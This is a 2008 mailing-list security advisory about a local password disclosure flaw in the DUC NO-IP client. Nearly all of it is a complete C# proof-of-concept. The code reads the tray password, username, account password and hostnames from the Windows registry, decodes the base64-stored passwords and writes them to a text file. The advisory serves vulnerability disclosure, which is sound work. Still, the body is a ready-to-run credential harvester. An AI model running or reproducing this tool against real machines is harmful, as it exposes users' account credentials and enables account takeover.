DUC NO-IP Local Password Information Disclosure Vulnerability

Mon, 16 Jun 2008 08:27:11 -0700 

/* 

 * DUC NO-IP Local Password Information Disclosure

 * Author(s): Charalambous Glafkos

 *            George Nicolaou

 * Date: March 11, 2008

 * Site: http://www.astalavista.com

 * Mail: [EMAIL PROTECTED]

 *       [EMAIL PROTECTED]

 *

 * Synopsis: DUC NO-IP is prone to an information disclosure vulnerability due 
to a design error.

 *           Attackers can exploit this issue to obtain sensitive information 
including tray password,

 *           web username, password and hostnames that may lead to further 
attacks.

 *            

 * Note: Vendor has been notified long time ago confirming a design error.

 * Vendor site: http://www.no-ip.com

 *           

 */


using System;

using System.Text;

using System.IO;

using Microsoft.Win32;


namespace getRegistryValue

{

    class getValue

    {

        static void Main()

        {

            getValue details = new getValue();

            String strDUC = details.getDUC();

            Console.WriteLine("\nDUC NO-IP Password Decoder v1.2");

            Console.WriteLine("Author: Charalambous Glafkos");

            Console.WriteLine("Bugs: [EMAIL PROTECTED]");

            Console.WriteLine(strDUC);


            FileInfo t = new FileInfo("no-ip.txt");

            StreamWriter Tex = t.CreateText();

            Tex.WriteLine(strDUC);

            Tex.Write(Tex.NewLine);

            Tex.Close();

            Console.WriteLine("\nThe file named no-ip.txt is created\n");

        }

        

        private string getDUC()

        {

            RegistryKey ducKey = Registry.LocalMachine;

            ducKey = ducKey.OpenSubKey(@"SOFTWARE\Vitalwerks\DUC", false);

            String TrayPassword = 
DecodeBytes(ducKey.GetValue("TrayPassword").ToString());

            String Username = ducKey.GetValue("Username").ToString();

            String Password = 
DecodeBytes(ducKey.GetValue("Password").ToString());

            String Hostnames = ducKey.GetValue("Hosts").ToString();

            String strDUC = "\nTrayPassword: " + TrayPassword

                + "\nUsername: " + Username

                + "\nPassword: " + Password

                + "\nHostnames: " + Hostnames;

            return strDUC;

        }


        public static string DecodeBytes(String encryptedData) 

    {

        Byte[] toDecodeByte = Convert.FromBase64String(encryptedData);

        System.Text.UTF8Encoding encoder = new System.Text.UTF8Encoding();

        System.Text.Decoder utf8Decode = encoder.GetDecoder();

        int charCount = utf8Decode.GetCharCount(toDecodeByte, 0, 
toDecodeByte.Length);

        Char[] decodedChar = new char[charCount];

        utf8Decode.GetChars(toDecodeByte, 0, toDecodeByte.Length, decodedChar, 
0);

        String result = new String(decodedChar);

        return (new string(decodedChar));

    }

  }   

}

Reply via email to